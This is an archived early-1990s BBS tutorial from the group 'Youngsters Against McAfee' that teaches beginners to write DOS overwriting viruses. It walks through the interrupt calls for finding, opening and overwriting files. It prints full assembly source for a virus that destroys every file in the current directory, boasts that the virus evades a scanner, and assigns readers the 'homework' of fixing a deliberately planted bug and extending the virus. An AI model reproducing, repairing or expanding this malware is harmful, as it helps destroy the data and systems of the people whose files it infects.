home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
texts
/
term_papers
/
yam-1.txt
< prev
next >
Wrap
Text File
|
1995-03-31
|
20KB
|
421 lines
___ ___ __________ _____________
/ | | \ / __ \ / \
| | | | | / \ | | |
| |_/ | | \__/ | | |
| | | | | || || |
\______ | | __ | | || || |
\ | | || | | | \_/ | |
________| | | || | | | | |
/ | | || | | | | |
|____________/ \___/ \___/ \__/ \__/
■ Youngsters Against McAfee ■
Present
An Intro to Virii
and
How to write Overwriting Virii
Part I of an on going series of the
Totally Whacked Out Virus Writer's Manual
By Admiral Bailey [YAM]
______________
--| Disclaimer |------------------------------------------------------------
~~~~~~~~~~~~~~
I am not responsible for any damage that is done by this text file or that
some person was encouraged to create a virii because they read this manual.
I have written this for study purposes only. Like John McAfee writing virii
for his study purposes.
___________________
--| Copyright Stuff |-(C)opyrite 1992---------------------------------------
~~~~~~~~~~~~~~~~~~~
I am giving this thing out to only those that are privileged enough to get
the Password from a YAM member. By asking and getting the password you
agree that you will not give the password to anybody else and you will keep
it a secret. This text file is Copywriter by me. If you tamper with it
in any way and distribute it as your own I will not be able to do anything
legal about it. But i can do something just as bad. So don't even think
about it.
Now onto the good stuff...
________________
--| Introduction |----------------------------------------------------------
~~~~~~~~~~~~~~~~
As you already know this is part one of an ongoing series of different
things to do with virii. The current file (Overwriting virii) is just the
first file of the total collection. The first few pages will be very boring
because this manual is aimed at the novice group of virii programmers.
Basically that's why I started with over writers. We all need to start
somewhere.
Now for this manual and every following manual you will need the
following:
■ A Knowledge of assembler. Not a lot but not too little.
■ An Assembler. All code (if any) given will be fully compatible
with TASM 2.0. I also recommend TASM 2.0 because its the best.
Whatever else is up to you.
__________________________
| Why Am I Writing This? |
~~~~~~~~~~~~~~~~~~~~~~~~~~
Why? Well because as I was learning this stuff I had no where to go for
help. I asked other people but what they told me sounded like greek. There
is no book you could buy with this and every other text file I have read
didn't have a clear enough explanation on the topic. So here is a complete
manual with loads of detail. Stuff that I wanted to know when I was starting
out. It may not be the best way to do these things but its the way that I
learned and use now.
___________________
| What are virii? |
~~~~~~~~~~~~~~~~~~~
Before anyone can create a virus they must first know what a virus is.
Well in general terms a virus is a small (or some large) computer program
that spread around computer systems by copying itself on the end of other
programs so that the virus is run first instead and control is returned to
the original (host) file. Some may think that this is not a problem. Well
it actually is. Most virii either annoy the user (not allowing them to use
their computer or slowing it down), do damage to the computer (format the
hard drive, erase files, corrupt files ect.), or some may just spread taking
up hard drive space as it infects every executable file. Most people get the
terms virus and trojan mixed up. They think that they are both the same
things when actually they aren't. A virus is just like i explained above as a
trojan is a program that will do harmful damage to a computer as it is run.
_______________________________________________
| What Type of Virus Are We Going to Discuss? |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In this manual we are going to start with one of the easiest less
complicated type of virus know as the Overwriting Virus. Its basically
called this because instead of it attaching onto the end of a file it will
overwrite the beginning of the file with a copy of itself. Therefore when
the host file is run only the virus will be executed and the host file will
be destroyed. This type of virus has its good points and its bad points.
Some of the good points are:
■ its easy to make
■ it does not change the file size of the host file
■ it causes data corruption
Some of the bad points are:
■ it destroys the host file there making the user suspect a virus has
hit him. (lack of stealth)
■ its so primitive that every lame user will now they got hit when
they receive a out of memory message or some shit like that.
■ it wont last long on a system because users will have to keep
replacing the corrupted files with new ones.
So we could just use these type of virii as a stepping stone until we learn
something better like com/exe infectors.
_______________________
| What Will You Need? |
~~~~~~~~~~~~~~~~~~~~~~~
You don't need much to create your first virus. Everything you should be
able to find on your local pirate board or if not get it off your local PD
board. Whichever but just as long as you get the stuff
To create your very first virus you will need all of the following:
■ TASM (Latest Version). Its the best!
■ Knowledge of assembly. Duh!? Whats Dat???
That's it at the basic's but if you want more here are some recommendations:
■ Any source code that you can use to help you. (Take a look at the
Seneca 1 virus.)
■ A good debugger. A lot of people like turbo debugger but
personally I like debug because its quick and simple.
■ Ralph Browns Interrupt list. Its pretty big (1 meg). But it has
almost every interrupt that you can call on a computer and its getting
bigger. Even has some undocumented calls.
■ Any virus mag. I personally like NUKE's because it has a lot of
info in it. But Evolution is still on top. :)
■ Sourcer so you can get a commented source of other virii that you
have.
■ And samples of other overwriting virii. That you can sourcer and
learn from.
Anything else as I said before is up to you.
_____________________
--| Let's Get Writing |----------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~
Before we start I just have to say that the virus that i will use as an
example will be completely stripped. That means it will not restore the
original dates/attributes or anything else. It will infect all the virii in the
current directory. Il write more manuals on stuff like that.
First i am going to show you a flow chart of what the basic outline of
execution should be. From there we will work.
┌─────┐
│Start│
└─────┘
│
┌─────────┐
┌──│Find file│
│ └─────────┘
│
│ ┌─────────┐ Nope ┌───────────────┐ ┌─────┐
│ │Any found│───────────│Display message│──────│Quit!│
│ └─────────┘ └───────────────┘ └─────┘
│ │ Yup
│ ┌───────┐
│ │Open It│
│ └───────┘
│ │
│ ┌───────────────┐
│ │Copy Self On to│
│ Beginning │
│ └───────────────┘
│ │
│ ┌──────────────┐
│ │ Close File │
│ │& find another│
│ └──────────────┘
└──────────┘
The flowchart is quite obvious. Just follow through it and you will get
the idea of how this type of virus will work. Now lets get into some code.
________________________________
| Finding The First/Next File? |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This will be quit simple to explain. Its the part that finds the first
file in the directory. There are two different types of procedure that is
used to find files. The first one finds the first file. The second one find
the next and on files using the info in the DTA (Data Transfer Area, will be
explained later.). They are pretty self explanatory and are as follows:
Find First: AX = 4Eh ; Find first command
DX = Offset of filetype ; Holds the file type to look for
; ex. '*.exe',0
CX = attributes on files to look for. We will set this to zero
using the xor command because we wont want to remove any
attributes off of read only files.
Find Next : AX = 4Fh ; that's all you need because then it
; gets the rest of the info from the dta
After filling these you execute interrupt 21h as usual.
____________________
| What Is the DTA? |
~~~~~~~~~~~~~~~~~~~~
DTA (Short for Data Transfer Area) is an area in the coding that holds
information for different reasons. For example if a program need command
line parameters like:
Scan C:
^------ Command line parameter
It stores these parameters in the DTA so that the program can read these
later. It also holds information about a file when using the find first/next
commands. The DTA starts at offset 80h and when the find first/next command
is called it fills the DTA as follows:
Offset Size Info Held
| |
15h | BYTE | attribute of file found
16h | WORD | file time
| | bits 11-15: hour
| | bits 5-10: minute
| | bits 0-4: seconds/2
18h | WORD | file date
| | bits 9-15: year-1980
| | bits 5-8: month
| | bits 0-4: day
1Ah | DWORD | file size
1Eh | 13ByT | ASCIIZ filename+extension
Since the DTA starts at 80h you must add 80h to the offset in order to get
a value. For example to get the file date you use :
Mov ax,[80h+18h] ; put the file date into ax
_________________________
| The Infection Process |
~~~~~~~~~~~~~~~~~~~~~~~~~
Now that you have found your file you have to infect it. To do this you
have to :
■ Open the file
■ Write virus over the beginning of file
■ Close file
As easy as that. To open the file you use the open file command.
Open File : AH = 3DH ; open file command
AL = 02h ; open for read/writing
DX = holds location of asciiz filename from the DTA
use the mothod explained under DTA
Now after it is opened you do a :
XCHG AX,BX
What that does is exchange the values in the ax and bx registers. When
the file is opened it puts the file handle (explained below) into bx. Why
well whenever you execute an interrupt that works with a file handle it
always wants the file handle in bx. So its easier to just put it in there
now and get it over with. But make sure you always save this handle and
never loose it or your file infection is screwed. So never replace bx while
a file is open!
Now after opening the file the file pointer is at the beginning of the
file. The file pointer just points to the location in the file you will
either write to or read from. All you have to do now is write to the file
using the write to file command.
Write To File : AH = 40h ; write to file command
BX = has file handle ; already there
DX = 100h ; location in our file to start
writing from. Set at 100h because
that's the start of all com files.
CX = file size ; can be calculated by subtracting
; the top of the file from the end.
; this tells the number of bytes to
; write
Now you close the file using the close file command.
Close File : AH = 3Eh ; close file command
BX = File handle
After you close the file you jump to find another file. If you cant find
another file then you can display a message and quit. (See an example
below.) The reason we don't check for previous infections is because if it
was previously infected then the virus will just write over itself. So there
is no real need. That's all there is to the infection process.
________________
| File Handles |
~~~~~~~~~~~~~~~~
File handles are just a temporary number that is given to every file when
they are opened. Its easier working with a file handle then using the file
name every time. You must NEVER erase your file handle in your program while
a file is open or else it the program will crash because it doesn't know what
file to work with. So always save by pushing it on the stack with a push bx
whenever you need to use the bx register.
__________________
| Error Checking |
~~~~~~~~~~~~~~~~~~
I haven't touched too much on error checking for one reason. It won't take
long. Basically when you execute a command when opening the file ect... you
can check if an error occurred by do a JC Quit command. When an error occurs
a carry flag is set. So the JC command means jump if carry. So if an error
occurs jump and you can close the file and find another. Easy.
______________
--| An Example |------------------------------------------------------------
~~~~~~~~~~~~~~
Below is just an example of an overwriting virus. As of scan 97 it is
unscannable. It may not be fully functional. (I don't just want people
compiling it and calling it there's so i put in an error.) HINT: The error
may be with opening the file for the first time.
;
; Written by Admiral Bailey
; YAM - Youngsters Against Mcafee
;
code segment
assume ds:code, ss:code, cs:code, es:code
org 100h ;Make it a .com file
seneca: ; marker for the beginning of virus
mov dx,offset file_type ;Load the type of file to look for
mov ah,4eh ;Find first file command
xor cx,cx ;Clear cx find only normal files
int 21h
jc quit ;if none found quit
jmp infect ;if found then infect
find_next_file:
mov ah,4fh ;find next file command
int 21h ;do it
cmp ax,12h ;any more files?
je quit ;nope then quit
jmp infect ;yup then infect
quit:
mov ah,9 ; display message command
mov dx,offset message ; location of the message
int 21h
int 20h ; halt program
infect:
mov ax,3d02h ; open file read/write
mov dx,80h+1eh ; file name location in DTA
int 21h ; do it
jc findnextfile ; if error find another file
; why not close first? Well the file
; never got opened to begin with
xchg bx,ax ; put the handle into bx
mov cx,virus_end-seneca ; put size of virus in cx
mov dx,100h ; where to start writing from
mov ah,40h ; write to file command
int 21h
closefile:
mov ah,3eh ; close the file
int 21h
jmp find_next_file ;now find another file
message db 'Hey Look Its An Overwriting Virus',13,10
db 'WOW!!!!',13,10
db 'And BTW this file is screwed',13,10,'$'
file_type db '*.*',0 ; get every file
virus_end equ $ ; marker for the end of the virus
code ends
end seneca
_____________
--| Home Work |-------------------------------------------------------------
~~~~~~~~~~~~~
If you want something to do then take the above virus fix the error and
then build it up. Do stuff like make it save attributes, time/date stamp
whatever. If you can't then I may be releasing a file on doing things like
that.
______________
--| Conclusion |------------------------------------------------------------
~~~~~~~~~~~~~~
In conclusion I would just like to say if this manual helped you any then
let me know. It will encourage me to write more. Future topics that I am
going to release are:
■ COM Infection
■ Extras You Can Add on to virii
■ Encryption using the xor method (This ones almost done)
■ EXE Infection
■ Different Ways Of Killing The Computer
■ Debug Killing techniques
And more as I learn. Before I go I wanna send out some greats :
NUKE : Love the Info journals (and virii)
Dark Angel : Hope this gets up there with your phunky virus writing
guide.
Phalcon/Skism : What is there to say but Whats up?!
John McAfee : Just helping out your job a bit. :) Remember me
when the money starts rolling' in.
Admiral Bailey [YAM]